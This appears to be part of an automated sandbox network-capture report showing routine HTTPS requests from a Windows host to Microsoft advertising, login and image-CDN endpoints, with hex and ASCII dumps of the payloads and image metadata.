                                                                                                                                                                                    2023-01-05 07:57:51 UTC295OUTGET /v1/a/installComplete?pg=PC000P0FR5.0000000IQ8&unid=314559&placementType=PostOOBE&app=&pid=425681888&cid=128000000003871249&tid=700342084&reqasid=34309a4234a64eed9bf34cb1d61fabc7&region=US&lang=EN-US&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.17134.1&mo=&cap=&auid=&anid=&muid=&persid=&itemId=9WZDNCRFHWD2&skuId=0010&installKind=RedirectTile&ctid=store-curated-postoobe&bSrc=i.t&asid=46e973b2872c43498ef85ee06e49e152&time=20230105T075739Z HTTP/1.1
                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                    User-Agent: WindowsShellClient/9.0.40929.0 (Windows)
                                                                                                                                                                                    Host: eudb.ris.api.iris.microsoft.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    2023-01-05 07:57:51 UTC296INHTTP/1.1 204 No Content
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                    request-id: 168fdd8e-2516-47c3-8cf2-40415163ccaf
                                                                                                                                                                                    Date: Thu, 05 Jan 2023 07:57:51 GMT
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    26192.168.2.44972420.65.78.40443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    2023-01-05 07:57:53 UTC296OUTGET /v1/a/opportunity?pg=PC000P0FR5.0000000IQ8&unid=314559&placementType=PostOOBE&app=&pid=425681888&cid=128000000003871249&tid=700342084&reqasid=34309a4234a64eed9bf34cb1d61fabc7&region=US&lang=EN-US&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.17134.1&mo=&cap=&auid=&anid=&muid=&persid=&itemId=9NBLGGH5R558&skuId=0010&installKind=RedirectTile&ctid=store-curated-postoobe&bSrc=i.t&asid=46e973b2872c43498ef85ee06e49e152&time=20230105T075740Z HTTP/1.1
                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                    User-Agent: WindowsShellClient/9.0.40929.0 (Windows)
                                                                                                                                                                                    Host: eudb.ris.api.iris.microsoft.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    2023-01-05 07:57:53 UTC297INHTTP/1.1 204 No Content
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                    request-id: bde9401c-9908-45e9-836b-2d0956020876
                                                                                                                                                                                    Date: Thu, 05 Jan 2023 07:57:52 GMT
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    27192.168.2.44972520.65.78.40443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    2023-01-05 07:57:53 UTC297OUTGET /v1/a/opportunity?pg=PC000P0FR5.0000000IQ8&unid=314559&placementType=PostOOBE&app=&pid=425681888&cid=128000000003871249&tid=700342084&reqasid=34309a4234a64eed9bf34cb1d61fabc7&region=US&lang=EN-US&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.17134.1&mo=&cap=&auid=&anid=&muid=&persid=&itemId=9NCBCSZSJRSB&skuId=0010&installKind=RedirectTile&ctid=store-curated-postoobe&bSrc=i.t&asid=46e973b2872c43498ef85ee06e49e152&time=20230105T075741Z HTTP/1.1
                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                    User-Agent: WindowsShellClient/9.0.40929.0 (Windows)
                                                                                                                                                                                    Host: eudb.ris.api.iris.microsoft.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    2023-01-05 07:57:53 UTC298INHTTP/1.1 204 No Content
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                    request-id: c83bc0e8-75f3-4a1e-bdab-a453ff7c00ed
                                                                                                                                                                                    Date: Thu, 05 Jan 2023 07:57:53 GMT
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    28192.168.2.44972620.65.78.40443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    2023-01-05 07:57:54 UTC298OUTGET /v1/a/opportunity?pg=PC000P0FR5.0000000IQ8&unid=314559&placementType=PostOOBE&app=&pid=425681888&cid=128000000003871249&tid=700342084&reqasid=34309a4234a64eed9bf34cb1d61fabc7&region=US&lang=EN-US&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.17134.1&mo=&cap=&auid=&anid=&muid=&persid=&itemId=9NXQXXLFST89&skuId=0010&installKind=RedirectTile&ctid=store-curated-postoobe&bSrc=i.t&asid=46e973b2872c43498ef85ee06e49e152&time=20230105T075741Z HTTP/1.1
                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                    User-Agent: WindowsShellClient/9.0.40929.0 (Windows)
                                                                                                                                                                                    Host: eudb.ris.api.iris.microsoft.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    2023-01-05 07:57:54 UTC298INHTTP/1.1 204 No Content
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                    request-id: 9ab471bd-d7f9-4c7b-9343-2bfc1d89679f
                                                                                                                                                                                    Date: Thu, 05 Jan 2023 07:57:53 GMT
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    29192.168.2.44972720.65.78.40443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    2023-01-05 07:57:54 UTC299OUTGET /v1/a/opportunity?pg=PC000P0FR5.0000000IQ8&unid=314559&placementType=PostOOBE&app=&pid=425681888&cid=128000000003871249&tid=700342084&reqasid=34309a4234a64eed9bf34cb1d61fabc7&region=US&lang=EN-US&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.17134.1&mo=&cap=&auid=&anid=&muid=&persid=&itemId=9WZDNCRFHWD2&skuId=0010&installKind=RedirectTile&ctid=store-curated-postoobe&bSrc=i.t&asid=46e973b2872c43498ef85ee06e49e152&time=20230105T075741Z HTTP/1.1
                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                    User-Agent: WindowsShellClient/9.0.40929.0 (Windows)
                                                                                                                                                                                    Host: eudb.ris.api.iris.microsoft.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    2023-01-05 07:57:54 UTC299INHTTP/1.1 204 No Content
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                    request-id: d9b84c1d-dee5-4ee6-9813-7f9ceae6ad67
                                                                                                                                                                                    Date: Thu, 05 Jan 2023 07:57:54 GMT
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    3192.168.2.44969820.190.159.1443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    2023-01-05 07:56:59 UTC92OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Content-Type: application/soap+xml
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 18.10.0.17134.0.0; IDCRL-cfg 16.000.29340.5; App svchost.exe, 10.0.17134.1, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                    Content-Length: 3592
                                                                                                                                                                                    Host: login.live.com
                                                                                                                                                                                    2023-01-05 07:56:59 UTC92OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                                                                    2023-01-05 07:56:59 UTC95INHTTP/1.1 200 OK
                                                                                                                                                                                    Cache-Control: no-store, no-cache
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                                                    Expires: Thu, 05 Jan 2023 07:55:59 GMT
                                                                                                                                                                                    P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                    Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                    x-ms-route-info: R3_BL2
                                                                                                                                                                                    x-ms-request-id: f3eae27c-e0c6-49b9-ab4a-f307009799b5
                                                                                                                                                                                    PPServer: PPV: 30 H: BL02PF611ABC623 V: 0
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                    Date: Thu, 05 Jan 2023 07:56:59 GMT
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Content-Length: 1318
                                                                                                                                                                                    2023-01-05 07:56:59 UTC96INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    30192.168.2.44972820.65.78.40443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    2023-01-05 07:57:55 UTC299OUTGET /v1/a/impression?CID=128000000003871249&region=US&lang=EN-US&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.17134.1&mo=&cap=&EID=&&PID=425681888&UIT=M-&TargetID=700342084&AN=749058556&PG=PC000P0FR5.0000000IQ8&REQASID=71556A9323DB45B28A3108EE5D06049B&UNID=314559&ID=00000000000000000000000000000001&ASID=46e973b2872c43498ef85ee06e49e152&REQT=20230105T075648&TIME=20230105T075742Z&RV=&RS=&DEVOSVER=10.0.17134.1&LOCALID=w:D9BC7EDF-91E8-C8ED-3ED4-3B144B30C00C&DS_EVTID=34309a4234a64eed9bf34cb1d61fabc7&WFIDS=&ER_AC=&ARCRAS=&CLR=CDM HTTP/1.1
                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                    User-Agent: WindowsShellClient/9.0.40929.0 (Windows)
                                                                                                                                                                                    Host: ris.api.iris.microsoft.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    2023-01-05 07:57:55 UTC300INHTTP/1.1 204 No Content
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                    request-id: 02e52d86-25db-4991-b718-27a111b973fa
                                                                                                                                                                                    Date: Thu, 05 Jan 2023 07:57:55 GMT
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    31192.168.2.44973480.67.82.211443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    2023-01-05 07:58:10 UTC300OUTGET /cms/api/am/imageFileData/RE55B7D?ver=b25f HTTP/1.1
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134
                                                                                                                                                                                    Host: img-prod-cms-rt-microsoft-com.akamaized.net
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    2023-01-05 07:58:10 UTC301INHTTP/1.1 200 OK
                                                                                                                                                                                    Content-Type: image/jpeg
                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                    Content-Location: https://image.prod.cms.rt.microsoft.com/cms/api/am/imageFileData/RE55B7D?ver=b25f
                                                                                                                                                                                    Last-Modified: Fri, 16 Dec 2022 19:39:47 GMT
                                                                                                                                                                                    X-Source-Length: 1797716
                                                                                                                                                                                    X-Datacenter: northeu
                                                                                                                                                                                    X-ActivityId: 116f833d-dd33-4d09-aa18-f15555ee161c
                                                                                                                                                                                    Timing-Allow-Origin: *
                                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                                    X-ResizerVersion: 1.0
                                                                                                                                                                                    Content-Length: 1797716
                                                                                                                                                                                    Cache-Control: public, max-age=301319
                                                                                                                                                                                    Expires: Sun, 08 Jan 2023 19:40:09 GMT
                                                                                                                                                                                    Date: Thu, 05 Jan 2023 07:58:10 GMT
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2023-01-05 07:58:10 UTC301INData Raw: ff d8 ff e1 17 06 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 91 87 69 00 04 00 00 00 01 00 00 00 a8 00 00 00 d4 00 0e a6 00 00 00 27 10 00 0e a6 00 00 00 27 10 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 33 2e 33 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 32 3a 30 36 3a 32 34 20 30 30 3a 31 31 3a 34 38 00 00 00 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 07 80 a0 03 00 04 00 00 00 01 00 00 04 38 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01 1a 00 05 00 00 00 01 00 00 01 22 01 1b 00 05 00
                                                                                                                                                                                    Data Ascii: ExifMM*bj(1r2i''Adobe Photoshop 23.3 (Windows)2022:06:24 00:11:488"
                                                                                                                                                                                    2023-01-05 07:58:10 UTC317INData Raw: cf a1 cb fe 87 fe 8b 54 ba 67 fc a7 47 d1 fe 91 5f f3 7f 43 e9 b7 e8 7f 23 fe f8 80 ae b7 e1 f2 ab 4a 7f ff d9 38 42 49 4d 04 21 00 00 00 00 00 57 00 00 00 01 01 00 00 00 0f 00 41 00 64 00 6f 00 62 00 65 00 20 00 50 00 68 00 6f 00 74 00 6f 00 73 00 68 00 6f 00 70 00 00 00 14 00 41 00 64 00 6f 00 62 00 65 00 20 00 50 00 68 00 6f 00 74 00 6f 00 73 00 68 00 6f 00 70 00 20 00 32 00 30 00 32 00 32 00 00 00 01 00 38 42 49 4d 0f a0 00 00 00 00 06 16 6d 6f 70 74 00 00 00 03 00 00 00 01 00 00 00 00 00 00 00 07 00 00 00 01 00 00 00 00 00 01 00 00 ff ff ff ff ff ff ff ff 00 00 00 2f 00 00 00 01 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 ff ff ff ff 00 00 00 00 04 ff ff ff ff 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff 00 00 00 00 ff
                                                                                                                                                                                    Data Ascii: TgG_C#J8BIM!WAdobe PhotoshopAdobe Photoshop 20228BIMmopt/
                                                                                                                                                                                    2023-01-05 07:58:10 UTC333INData Raw: 5f 31 39 32 30 78 31 30 38 30 2e 6a 70 67 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 36 2d 30 37 2d 32 36 54 31 30 3a 34 33 3a 34 39 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 45 64 67 65 5c 5f 43 72 6f 70 73 5c 45 64 67 65 2d 4c 69 66 65 73 74 79 6c 65 5f 47 65 74 74 79 49 6d 61 67 65 73 2d 35 39 35 33 36 35 30 36 37 5f 31 39 32 30 78 31 30 38 30 2e 6a 70 67 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 36 2d 30 37 2d 32 36 54 31 30 3a 34 36 3a 30 32 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 45 64 67 65 5c 5f 43 72 6f 70 73 5c 45 64 67 65 2d 4c 69 66 65 73 74 79 6c
                                                                                                                                                                                    Data Ascii: _1920x1080.jpg saved&#xA;2016-07-26T10:43:49-07:00&#x9;File C:\Users\v-lizagh\MS\Windows10\Edge\_Crops\Edge-Lifestyle_GettyImages-595365067_1920x1080.jpg saved&#xA;2016-07-26T10:46:02-07:00&#x9;File C:\Users\v-lizagh\MS\Windows10\Edge\_Crops\Edge-Lifestyl
                                                                                                                                                                                    2023-01-05 07:58:10 UTC335INData Raw: 39 5f 31 39 32 30 78 31 30 38 30 2e 6a 70 67 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 36 2d 30 37 2d 32 36 54 31 31 3a 30 36 3a 31 34 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 45 64 67 65 5c 43 72 6f 70 73 5c 4c 6f 63 6b 73 63 72 65 65 6e 5f 31 39 32 30 78 31 30 38 30 5f 4c 61 6e 64 73 63 61 70 65 2e 70 73 64 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 36 2d 30 37 2d 32 36 54 31 31 3a 30 36 3a 31 38 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 45 64 67 65 5c 43 72 6f 70 73 5c 4c 6f 63 6b 73 63 72 65 65 6e 5f 31 39 32 30 78 31 30 38 30 5f 4c 61 6e 64 73 63 61 70 65
                                                                                                                                                                                    Data Ascii: 9_1920x1080.jpg saved&#xA;2016-07-26T11:06:14-07:00&#x9;File C:\Users\v-lizagh\MS\Windows10\Edge\Crops\Lockscreen_1920x1080_Landscape.psd saved&#xA;2016-07-26T11:06:18-07:00&#x9;File C:\Users\v-lizagh\MS\Windows10\Edge\Crops\Lockscreen_1920x1080_Landscape
                                                                                                                                                                                    2023-01-05 07:58:10 UTC351INData Raw: 38 35 43 33 30 44 45 36 34 33 44 46 35 42 35 37 39 2e 70 73 62 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 36 2d 30 39 2d 31 33 54 31 37 3a 33 33 3a 31 35 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 4c 6f 63 6b 73 63 72 65 65 6e 5f 31 39 32 30 78 31 30 38 30 5f 4c 61 6e 64 73 63 61 70 65 2e 70 73 64 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 36 2d 30 39 2d 31 35 54 31 36 3a 30 34 3a 31 37 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 4c 6f 63 6b 73 63 72 65 65 6e 5f 31 39 32 30 78 31 30 38 30 5f 4c 61 6e 64 73 63 61 70 65 2e 70 73 64 20 6f 70 65 6e 65 64 26 23 78 41 3b 32 30 31 36 2d 30 39 2d 31 35 54 31 36 3a 31 30 3a 34 31 2d 30 37 3a 30 30 26 23 78 39 3b 46
                                                                                                                                                                                    Data Ascii: 85C30DE643DF5B579.psb saved&#xA;2016-09-13T17:33:15-07:00&#x9;File C:\Users\v-lizagh\MS\Windows10\Lockscreen_1920x1080_Landscape.psd saved&#xA;2016-09-15T16:04:17-07:00&#x9;File Lockscreen_1920x1080_Landscape.psd opened&#xA;2016-09-15T16:10:41-07:00&#x9;F
                                                                                                                                                                                    2023-01-05 07:58:10 UTC367INData Raw: 31 36 2d 31 31 2d 31 30 54 32 32 3a 31 39 3a 31 36 2d 30 38 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 4d 6f 6d 65 6e 74 73 49 6e 54 69 6d 65 5c 4e 46 4c 5c 43 48 4f 53 45 4e 5c 4e 65 77 20 66 6f 6c 64 65 72 5c 4d 49 54 5f 4e 46 4c 5f 47 65 74 74 79 49 6d 61 67 65 73 2d 35 32 30 35 33 38 30 33 39 5f 31 39 32 30 78 31 30 38 30 2e 6a 70 67 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 36 2d 31 31 2d 31 30 54 32 32 3a 32 38 3a 31 35 2d 30 38 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 41 70 70 44 61 74 61 5c 52 6f 61 6d 69 6e 67 5c 41 64 6f 62 65 5c 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 43 20 32 30 31 35 2e 35 5c
                                                                                                                                                                                    Data Ascii: 16-11-10T22:19:16-08:00&#x9;File C:\Users\v-lizagh\MS\Windows10\MomentsInTime\NFL\CHOSEN\New folder\MIT_NFL_GettyImages-520538039_1920x1080.jpg saved&#xA;2016-11-10T22:28:15-08:00&#x9;File C:\Users\v-lizagh\AppData\Roaming\Adobe\Adobe Photoshop CC 2015.5\
                                                                                                                                                                                    2023-01-05 07:58:10 UTC375INData Raw: 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 4f 66 66 69 63 65 5c 4f 66 66 69 63 65 2d 42 61 74 63 68 32 5c 5f 43 48 4f 53 45 4e 2d 53 6b 79 70 65 5c 43 72 6f 70 73 5c 4f 66 66 69 63 65 5f 53 6b 79 70 65 5f 73 68 75 74 74 65 72 73 74 6f 63 6b 5f 33 36 39 35 39 36 31 36 38 5f 31 39 32 30 78 31 30 38 30 2e 6a 70 67 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 36 2d 31 31 2d 32 33 54 31 34 3a 35 35 3a 33 38 2d 30 38 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 41 70 70 44 61 74 61 5c 52 6f 61 6d 69 6e 67 5c 41 64 6f 62 65 5c 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 43 20 32 30 31 35 2e 35 5c 41 75 74 6f 52 65 63 6f 76 65 72 5c 5f 4f 66 66 69 63 65 5f 53 6b 79 70 65 5f 47 65 74 74 79 49 6d
                                                                                                                                                                                    Data Ascii: lizagh\MS\Windows10\Office\Office-Batch2\_CHOSEN-Skype\Crops\Office_Skype_shutterstock_369596168_1920x1080.jpg saved&#xA;2016-11-23T14:55:38-08:00&#x9;File C:\Users\v-lizagh\AppData\Roaming\Adobe\Adobe Photoshop CC 2015.5\AutoRecover\_Office_Skype_GettyIm
                                                                                                                                                                                    2023-01-05 07:58:10 UTC391INData Raw: 39 30 39 31 36 33 38 5f 31 39 32 30 78 31 30 38 30 2e 70 73 64 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 37 2d 30 31 2d 33 30 54 31 30 3a 30 33 3a 31 33 2d 30 38 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 41 70 70 44 61 74 61 5c 52 6f 61 6d 69 6e 67 5c 41 64 6f 62 65 5c 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 43 20 32 30 31 35 2e 35 5c 41 75 74 6f 52 65 63 6f 76 65 72 5c 5f 4d 49 54 2d 4e 41 53 43 41 52 2d 46 65 62 5f 47 65 74 74 79 49 6d 61 67 65 73 2d 34 36 39 30 39 31 36 33 38 5f 31 39 32 30 78 31 30 38 30 41 45 45 46 45 38 41 32 43 31 46 42 31 37 41 44 37 39 39 34 44 44 41 34 38 30 39 37 34 38 46 34 2e 70 73 62 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 37 2d 30 31 2d 33 30 54 31 30 3a 35 34
                                                                                                                                                                                    Data Ascii: 9091638_1920x1080.psd saved&#xA;2017-01-30T10:03:13-08:00&#x9;File C:\Users\v-lizagh\AppData\Roaming\Adobe\Adobe Photoshop CC 2015.5\AutoRecover\_MIT-NASCAR-Feb_GettyImages-469091638_1920x1080AEEFE8A2C1FB17AD7994DDA4809748F4.psb saved&#xA;2017-01-30T10:54
                                                                                                                                                                                    2023-01-05 07:58:10 UTC407INData Raw: 30 5f 4c 61 6e 64 73 63 61 70 65 2e 70 73 64 20 6f 70 65 6e 65 64 26 23 78 41 3b 32 30 31 37 2d 30 32 2d 32 36 54 31 33 3a 32 37 3a 35 34 2d 30 38 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 4d 6f 6d 65 6e 74 73 49 6e 54 69 6d 65 5c 57 6f 6d 65 6e 73 4d 6f 6e 74 68 5c 43 48 4f 53 45 4e 5c 4d 49 54 5f 57 6f 6d 65 6e 73 48 69 73 74 6f 72 79 4d 6f 6e 74 68 5f 35 30 30 70 78 2d 39 30 35 38 39 33 30 33 5f 31 39 32 30 78 31 30 38 30 2e 70 73 64 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 37 2d 30 32 2d 32 36 54 31 33 3a 32 38 3a 35 30 2d 30 38 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 4d
                                                                                                                                                                                    Data Ascii: 0_Landscape.psd opened&#xA;2017-02-26T13:27:54-08:00&#x9;File C:\Users\v-lizagh\MS\Windows10\MomentsInTime\WomensMonth\CHOSEN\MIT_WomensHistoryMonth_500px-90589303_1920x1080.psd saved&#xA;2017-02-26T13:28:50-08:00&#x9;File C:\Users\v-lizagh\MS\Windows10\M
